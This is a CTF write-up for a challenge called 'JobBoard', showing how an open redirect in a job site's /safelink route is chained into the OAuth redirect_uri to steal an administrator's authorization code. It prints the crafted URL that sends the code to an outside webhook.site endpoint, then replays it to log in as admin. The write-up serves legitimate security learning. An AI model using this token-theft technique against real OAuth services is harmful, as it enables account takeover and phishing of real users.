Writeup DGA - CTF - JobBoard
This article describes my solution for the 200-point challenge called “JobBoard”
Introduction
En cherchant un job d’ingénieur en cybersécurité, vous avez trouvé un site web proposant des annonces très intéressantes, mais il faut des identifiants particuliers pour y accéder.
Pourrez-vous en découvrir un ? Il parait que le compte admin permet de visualiser les futures offres en cybersécurité étatique à DGA MI ?
Start
We have at our disposal a platform to find a job. It is necessary to be logged in to see jobs. By clicking on the Browse job
tab, we are offered a couple of login/password test:test
. In addition, there is an interesting information.
Just login with OAuth using the tests credentials : test:test
We already learn that the authentication part is done via the OAuth protocol. OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites but without giving them the passwords.
As soon as we are logged in, we can see a job list. One of them requires to be administrator to see it (it is grayed out and has the title Secret position
).
By clicking on the title of the work, one is redirected to the following link for all those listed.
http://jobboard2.chall.malicecyber.com/safelink/http://example.com/
It’s kind of weird.
I was already aware of some of the vulnerabilities in the OAuth protocol and this link made me think of something: open redirect attacks.
An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
The principle consists in arbitrarily defining the redirection URL that a target platform deemed to be trustworthy will forward. It is thus possible to carry out phishing attacks from an initial trusted URL, or to retrieve data/tokens from authentication protocols in order to access the victims’ personal information.
Let’s analyze the authentication prodcedure with OAuth.
The address below allows you to display a request for connection authorization. There are two things in this URL:
- The
client_id
which is the identifier of the application. - The
redirect_uri
which is the address to which the user will be redirected once he allows the application to connect with his credentials.
http://jobboard2.chall.malicecyber.com/oauth/authorize?client_id=svvhKlyEA7qODbl16JTUPQNz&response_type=code&redirect_uri=http%3A%2F%2Fjobboard2.chall.malicecyber.com%2Fconnect%2Fauth%2Fcallback&scope=profile
As soon as the user presses the Accept
button, an HTTP POST request is made. Then an HTTP GET request is performed on the URL below with as query string code
the value of the code retrieved via the HTTP POST request.
http://jobboard2.chall.malicecyber.com/connect/auth/callback?code=3Z2jHh9PQ7nC2nf5lJ8mG8i4hCB7ttjPYsXyC6mkpPjvYn9C
Finally, a last HTTP GET request is made. It allows to define several headers especially.
The goal of the attack we are going to perform is to use the /safelink
route to put a malicious URL in order to retrieve the code
(second request) from the administrator.
It will be possible to send our malicious link via the contact form at our disposal on the platform.
Exploitation
Once again I’m going to use the webhook.site to be able to analyze the queries that are made on the endpoint.
The URL below contains the redirection to the tool that will allow me to retrieve the value of the query string code
. Please note that the /
character is double-encoded to avoid turning the %2F
character into /
which would have the effect of breaking the path.
http://jobboard.chall.malicecyber.com/oauth/authorize?client_id=svvhKlyEA7qODbl16JTUPQNz&response_type=code&redirect_uri=http:%2F%2Fjobboard.chall.malicecyber.com%2Fsafelink%2Fhttps%3A%252F%252Fwebhook.site%252Ff806734c-e43d-45cd-a4a1-f6df2d774f7b%252F&scope=profile
A few seconds later, I retrieve this code.
/?code=959005d2782349217bb2e361fba90902536a452eb01b990e
Then, I build the URL the next second HTTP GET request by putting the retrieved code at the end of the URL.
http://jobboard2.chall.malicecyber.com/connect/auth/callback?code=959005d2782349217bb2e361fba90902536a452eb01b990e
By inserting this URL in the browser, the third request will be called and will log us in as administrator. This will allow us to see the job offer that was previously grayed out. This offer is called DontRollYourOwn
and this is the flag to validate this challenge.